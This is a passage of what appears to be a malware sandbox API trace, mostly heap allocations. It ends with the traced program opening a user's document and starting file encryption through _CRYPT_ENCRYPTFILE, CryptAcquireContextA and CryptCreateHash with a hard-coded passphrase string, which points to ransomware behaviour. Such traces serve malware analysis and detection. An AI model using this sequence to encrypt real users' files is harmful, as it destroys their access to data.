dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\cyt5wt.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0078.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0078.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0078.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0078.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0078.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0078.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0078.960] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0078.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.962] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.962] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0078.962] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0078.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0078.964] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.965] CloseHandle (hObject=0x258) returned 1 [0078.965] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.965] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.965] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\cYT5WT.odt", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8c5f600, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x29ad7e90, ftLastAccessTime.dwHighDateTime=0x1d5e445, ftLastWriteTime.dwLowDateTime=0x29ad7e90, ftLastWriteTime.dwHighDateTime=0x1d5e445, nFileSizeHigh=0x0, nFileSizeLow=0x18b87, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="cYT5WT.odt", cAlternateFileName="")) returned 0x41ac500 [0078.965] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0078.966] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.966] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.966] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.966] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.967] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.967] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.967] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.967] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caaa8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.968] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0078.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.968] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 